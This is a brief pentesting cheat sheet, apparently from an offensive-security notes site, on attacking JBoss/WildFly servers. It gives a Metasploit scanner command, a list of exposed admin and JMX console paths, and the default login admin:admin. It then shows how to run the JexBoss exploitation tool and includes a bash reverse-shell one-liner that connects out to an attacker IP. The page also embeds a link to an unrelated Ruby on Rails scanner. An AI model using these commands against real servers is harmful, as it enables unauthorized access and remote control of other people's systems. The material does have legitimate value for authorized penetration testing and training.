# JBOSS Pentesting

JBOSS AS (Application Server), also known as WildFly, is an application server which is written in Java.

### Enumeration <a href="#enumeration" id="enumeration"></a>

```shellscript
msfconsole
msf > use auxiliary/scanner/http/jboss_vulnscan
```

### Common Directories <a href="#common-directories" id="common-directories"></a>

```shellscript
/admin-console/
/invoker/JMXInvokerServlet
/jbossws/
/jmx-console/
/jmx-console/HtmlAdaptor
/management
/manager
/status?full=true
/web-console/
/web-console/Invoker
/web-console/ServerInfo.jsp
```

### Default Credentials <a href="#default-credentials" id="default-credentials"></a>

```shellscript
admin:admin
```

### Exploitation <a href="#exploitation" id="exploitation"></a>

[JexBoss](https://github.com/joaomatosf/jexboss) is available as an exploitation CLI tool.

```shellscript
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip3 install -r requirements.txt
python3 jexboss.py -host https://example.com:8080

# Reverse Shell
Shell> /bin/bash -i > /dev/tcp/10.0.0.1/4444 0>&1 2>&1

```

{% embed url="<https://github.com/presidentbeef/brakeman>" %}

```
# JexBoss
# https://github.com/joaomatosf/jexboss
python jexboss.py -host http://target_host:8080
```
